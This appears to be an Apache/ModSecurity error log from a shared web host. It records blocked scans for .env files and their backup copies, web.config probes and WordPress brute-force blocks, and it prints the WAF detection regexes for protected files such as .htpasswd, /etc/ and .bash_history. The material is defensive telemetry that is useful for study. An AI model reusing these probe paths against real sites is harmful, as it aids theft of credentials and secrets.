[Tue May 26 13:44:42.776755 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.776791 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36378] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:42.777101 2026] [security2:error] [pid 536875:tid 537081] [client 208.84.100.173:36284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVWcur_-FTveSGlx1H6fQAAANE"]
[Tue May 26 13:44:42.777352 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:42.777386 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36378] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:43.904572 2026] [security2:error] [pid 536875:tid 537112] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWc-r_-FTveSGlx1H6gQAAAPA"]
[Tue May 26 13:44:43.975200 2026] [proxy:error] [pid 536875:tid 537079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:43.975257 2026] [proxy_http:error] [pid 536875:tid 537079] [client 208.84.100.173:36322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:43.975910 2026] [proxy:error] [pid 536875:tid 537079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:43.975963 2026] [proxy_http:error] [pid 536875:tid 537079] [client 208.84.100.173:36322] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.192662 2026] [security2:error] [pid 536875:tid 537080] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWc-r_-FTveSGlx1H6iQAAANA"]
[Tue May 26 13:44:44.559487 2026] [security2:error] [pid 536875:tid 537011] [client 208.84.100.173:36312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVWdOr_-FTveSGlx1H6oAAAAIs"]
[Tue May 26 13:44:44.678932 2026] [proxy:error] [pid 536875:tid 537086] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.678990 2026] [proxy_http:error] [pid 536875:tid 537086] [client 208.84.100.173:36284] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.679282 2026] [proxy:error] [pid 536875:tid 537033] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.679356 2026] [proxy_http:error] [pid 536875:tid 537033] [client 208.84.100.173:36332] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.679603 2026] [proxy:error] [pid 536875:tid 537086] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.679649 2026] [proxy_http:error] [pid 536875:tid 537086] [client 208.84.100.173:36284] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.679976 2026] [proxy:error] [pid 536875:tid 537033] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.680012 2026] [proxy_http:error] [pid 536875:tid 537033] [client 208.84.100.173:36332] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.872960 2026] [security2:error] [pid 536875:tid 537007] [client 106.192.248.115:19978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWdOr_-FTveSGlx1H6rQAAAIc"]
[Tue May 26 13:44:44.873119 2026] [security2:error] [pid 536875:tid 537007] [client 106.192.248.115:19978] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWdOr_-FTveSGlx1H6rQAAAIc"]
[Tue May 26 13:44:44.975230 2026] [proxy:error] [pid 536875:tid 537091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.975278 2026] [proxy_http:error] [pid 536875:tid 537091] [client 208.84.100.173:36312] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:44.975876 2026] [proxy:error] [pid 536875:tid 537091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:44.975912 2026] [proxy_http:error] [pid 536875:tid 537091] [client 208.84.100.173:36312] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.063025 2026] [security2:error] [pid 536875:tid 537119] [client 208.84.100.173:36602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVWder_-FTveSGlx1H6sQAAAPc"]
[Tue May 26 13:44:45.063051 2026] [security2:error] [pid 544395:tid 544616] [client 208.84.100.173:36616] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVWdRmrs7g3RMCdp8XfmQAAAFs"]
[Tue May 26 13:44:45.063745 2026] [security2:error] [pid 536875:tid 537109] [client 208.84.100.173:36574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVWder_-FTveSGlx1H6tQAAAO0"]
[Tue May 26 13:44:45.064298 2026] [security2:error] [pid 536875:tid 537078] [client 208.84.100.173:36566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVWder_-FTveSGlx1H6twAAAM4"]
[Tue May 26 13:44:45.064675 2026] [security2:error] [pid 536875:tid 537119] [client 208.84.100.173:36466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVWder_-FTveSGlx1H6vgAAAPc"]
[Tue May 26 13:44:45.064694 2026] [security2:error] [pid 536875:tid 537036] [client 208.84.100.173:36552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVWder_-FTveSGlx1H6uQAAAKQ"]
[Tue May 26 13:44:45.064708 2026] [security2:error] [pid 536875:tid 537081] [client 208.84.100.173:36542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVWder_-FTveSGlx1H6uAAAANE"]
[Tue May 26 13:44:45.064723 2026] [security2:error] [pid 536875:tid 537016] [client 208.84.100.173:36592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVWder_-FTveSGlx1H6swAAAJA"]
[Tue May 26 13:44:45.065097 2026] [security2:error] [pid 536875:tid 537021] [client 208.84.100.173:36558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVWder_-FTveSGlx1H6tgAAAJU"]
[Tue May 26 13:44:45.065110 2026] [security2:error] [pid 544395:tid 544563] [client 208.84.100.173:36496] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVWdRmrs7g3RMCdp8XfmgAAACY"]
[Tue May 26 13:44:45.065129 2026] [security2:error] [pid 536875:tid 537126] [client 208.84.100.173:36516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVWder_-FTveSGlx1H6uwAAAP4"]
[Tue May 26 13:44:45.065224 2026] [security2:error] [pid 536875:tid 537055] [client 208.84.100.173:36472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVWder_-FTveSGlx1H6vQAAALc"]
[Tue May 26 13:44:45.065237 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.065298 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.065326 2026] [security2:error] [pid 536875:tid 537070] [client 208.84.100.173:36512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVWder_-FTveSGlx1H6vAAAAMY"]
[Tue May 26 13:44:45.065355 2026] [security2:error] [pid 536875:tid 537088] [client 208.84.100.173:36588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVWder_-FTveSGlx1H6sgAAANg"]
[Tue May 26 13:44:45.066018 2026] [proxy:error] [pid 544395:tid 544610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.066055 2026] [proxy_http:error] [pid 544395:tid 544610] [client 208.84.100.173:36414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.066170 2026] [security2:error] [pid 544395:tid 544538] [client 208.84.100.173:36394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVWdRmrs7g3RMCdp8XfngAAAA0"]
[Tue May 26 13:44:45.066332 2026] [security2:error] [pid 544395:tid 544595] [client 208.84.100.173:36438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVWdRmrs7g3RMCdp8XfmwAAAEY"]
[Tue May 26 13:44:45.066363 2026] [security2:error] [pid 544395:tid 544622] [client 208.84.100.173:36482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVWdRmrs7g3RMCdp8XfoAAAAGE"]
[Tue May 26 13:44:45.066364 2026] [security2:error] [pid 544395:tid 544602] [client 208.84.100.173:36452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVWdRmrs7g3RMCdp8XfnwAAAE0"]
[Tue May 26 13:44:45.066389 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.066457 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.066739 2026] [proxy:error] [pid 544395:tid 544619] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.066789 2026] [proxy_http:error] [pid 544395:tid 544619] [client 208.84.100.173:36460] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.067038 2026] [security2:error] [pid 544395:tid 544611] [client 208.84.100.173:36486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVWdRmrs7g3RMCdp8XfoQAAAFY"]
[Tue May 26 13:44:45.067476 2026] [proxy:error] [pid 544395:tid 544619] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.067525 2026] [proxy_http:error] [pid 544395:tid 544619] [client 208.84.100.173:36460] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.067528 2026] [security2:error] [pid 544395:tid 544585] [client 208.84.100.173:36436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.thedebateafrica.org"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVWdRmrs7g3RMCdp8XfowAAADw"]
[Tue May 26 13:44:45.067619 2026] [proxy:error] [pid 544395:tid 544610] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.067679 2026] [proxy_http:error] [pid 544395:tid 544610] [client 208.84.100.173:36414] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068362 2026] [proxy:error] [pid 536875:tid 537038] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068375 2026] [proxy:error] [pid 544395:tid 544616] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068403 2026] [proxy_http:error] [pid 536875:tid 537038] [client 208.84.100.173:36526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068416 2026] [proxy_http:error] [pid 544395:tid 544616] [client 208.84.100.173:36406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068520 2026] [proxy:error] [pid 536875:tid 537085] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068566 2026] [proxy_http:error] [pid 536875:tid 537085] [client 208.84.100.173:36594] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.068598 2026] [proxy:error] [pid 544395:tid 544612] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.068666 2026] [proxy_http:error] [pid 544395:tid 544612] [client 208.84.100.173:36420] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.069027 2026] [proxy:error] [pid 544395:tid 544616] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.069065 2026] [proxy_http:error] [pid 544395:tid 544616] [client 208.84.100.173:36406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:45.069300 2026] [proxy:error] [pid 544395:tid 544612] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:45.069358 2026] [proxy_http:error] [pid 544395:tid 544612] [client 208.84.100.173:36420] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:46.026129 2026] [security2:error] [pid 544395:tid 544543] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWdRmrs7g3RMCdp8XfsAAAABI"]
[Tue May 26 13:44:46.284204 2026] [proxy:error] [pid 536875:tid 537131] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:46.284277 2026] [proxy_http:error] [pid 536875:tid 537131] [client 208.84.100.173:36592] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:46.284916 2026] [proxy:error] [pid 536875:tid 537131] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:44:46.284962 2026] [proxy_http:error] [pid 536875:tid 537131] [client 208.84.100.173:36592] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:44:48.967061 2026] [security2:error] [pid 544395:tid 544567] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWeBmrs7g3RMCdp8Xf0gAAACo"]
[Tue May 26 13:44:49.986404 2026] [security2:error] [pid 544395:tid 544613] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWeRmrs7g3RMCdp8Xf6AAAAFg"]
[Tue May 26 13:44:50.360244 2026] [security2:error] [pid 544395:tid 544414] [remote 45.148.10.218:58922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/web.config"] [unique_id "ahVWehmrs7g3RMCdp8Xf_gAALRI"]
[Tue May 26 13:44:51.340360 2026] [security2:error] [pid 536875:tid 537011] [client 129.222.147.134:39400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWe-r_-FTveSGlx1H7GgAAAIs"]
[Tue May 26 13:44:51.348148 2026] [security2:error] [pid 536875:tid 537011] [client 129.222.147.134:39400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWe-r_-FTveSGlx1H7GgAAAIs"]
[Tue May 26 13:44:51.564811 2026] [security2:error] [pid 544395:tid 544552] [client 209.146.63.66:54313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 66.63.146.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVWexmrs7g3RMCdp8XgJQAAABs"]
[Tue May 26 13:44:51.918841 2026] [security2:error] [pid 544395:tid 544622] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWexmrs7g3RMCdp8XgKgAAAGE"]
[Tue May 26 13:44:53.592890 2026] [security2:error] [pid 544395:tid 544614] [client 104.164.173.136:9836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVWfRmrs7g3RMCdp8XgigAAAFk"]
[Tue May 26 13:44:54.372579 2026] [security2:error] [pid 544395:tid 544615] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWfRmrs7g3RMCdp8XgoQAAAFo"]
[Tue May 26 13:44:55.107589 2026] [security2:error] [pid 544395:tid 544551] [client 35.237.188.134:64947] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.188.237.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "plenitudotonal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWfhmrs7g3RMCdp8XgtgAAABo"]
